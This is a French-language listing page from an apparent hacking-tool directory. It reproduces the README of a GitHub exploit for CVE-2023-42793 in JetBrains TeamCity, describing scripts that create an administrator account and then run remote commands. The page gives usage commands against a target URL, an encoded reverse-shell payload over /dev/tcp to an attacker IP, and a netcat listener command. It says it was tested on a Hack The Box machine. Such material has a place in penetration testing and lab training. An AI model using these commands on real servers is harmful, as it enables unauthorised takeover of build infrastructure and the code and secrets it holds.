Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-42793 — JetBrains TeamCity 2023.05.3 - Exécution de code à distance (RCE), CVE-2023-42793 | Kitploit
Outils/GitHubGitHub/b4l3ri0n/cve-2023-42793
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubb4l3ri0n/cve-2023-42793

CVE-2023-42793

JetBrains TeamCity 2023.05.3 - Exécution de code à distance (RCE), CVE-2023-42793

Voir le dépôt
1136il y a 2 ansPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-42793 - Création de compte administrateur TeamCity conduit à une RCE

utilisez d'abord exploit.py pour créer un compte administrateur pour vous, puis utilisez rce.py pour exécuter des commandes sur la cible, et pour un reverse shell consultez ce lien

script d'exploitation

Description

Ce script exploite CVE-2023-42793 pour créer un compte administrateur sur un serveur TeamCity. Il envoie une requête POST à l'URL cible pour créer un utilisateur administrateur avec des identifiants spécifiés ou aléatoires.

Utilisation

python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]

Options

  • -u, --url URL : URL cible (obligatoire)
  • -v, --verbose : Activer le mode verbeux
  • -n, --username USERNAME : Spécifier le nom d'utilisateur (par défaut : aléatoire)
  • -p, --password PASSWORD : Spécifier le mot de passe (par défaut : aléatoire)
  • -e, --email EMAIL : Spécifier l'email (par défaut : aléatoire)
  • -t, --token-file : Fichier pour sauvegarder le jeton

Prérequis

  • Python 3.x
  • Bibliothèques Python
    • Pour installer les dépendances : pip3 install -r requirements.txt

Exemples

  1. Exploitation avec nom d'utilisateur, mot de passe et email aléatoires :

    python exploit.py -u http://target.com
    
  2. Exploitation avec nom d'utilisateur, mot de passe et email spécifiés :

    python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
    

Sortie

En cas d'exploitation réussie, le script affiche l'URL, le nom d'utilisateur et le mot de passe du compte administrateur créé, puis sauvegarde la sortie dans le fichier de jeton.

Script d'exécution de code à distance (RCE)

Description Ce script permet d'exécuter des commandes sur un serveur TeamCity vulnérable en exploitant CVE-2023-42793. Il active d'abord les processus de débogage puis exécute la commande spécifiée en utilisant les points d'API appropriés.

Utilisation

python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]

Options

  • -u, --url URL : URL cible (obligatoire)
  • -t, --token-file : Pour spécifier le fichier contenant le jeton
  • -c, --command COMMAND : Spécifier la commande à exécuter (RCE)
  • -P, --port PORT : Spécifier le port (par défaut 80)

Exemple

Exploitation avec une commande spécifiée :

python rce.py -u http://target.com -t token -c "whoami"

Pour un reverse shell

python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
  • Dans cette commande pour reverse shell, remplacez {IP} par votre IP et {port} par le port sur lequel vous écoutez
  • Créez un écouteur avec nc par exemple nc -nvlp 5555
  • Pour plus d'informations, consultez revshells

Remarques

  • Ce script a été testé sur Runner.htb de Hack The Box
  • Ce script est à but éducatif uniquement.
  • Utilisez-le de manière responsable et uniquement sur des systèmes que vous êtes autorisé à tester.

Crédits

  • Zyad Elsayed
    • GitHub Repository: Zyad-Elsayed
    • LinkedIn account: zyad-abdelbary
  • Exploit original pour compte administrateur : ByteHunter (Exploit-DB)

Ressources

  • Description CVE-2023-42793 : Description officielle de la vulnérabilité CVE.
  • Entrée de l'Exploit Database : Code d'exploitation original sur Exploit Database.
  • Blog TeamCity : Article de blog discutant de la vulnérabilité CVE-2023-42793 dans TeamCity.
  • Documentation TeamCity : Documentation officielle de TeamCity.
Télécharger l’outil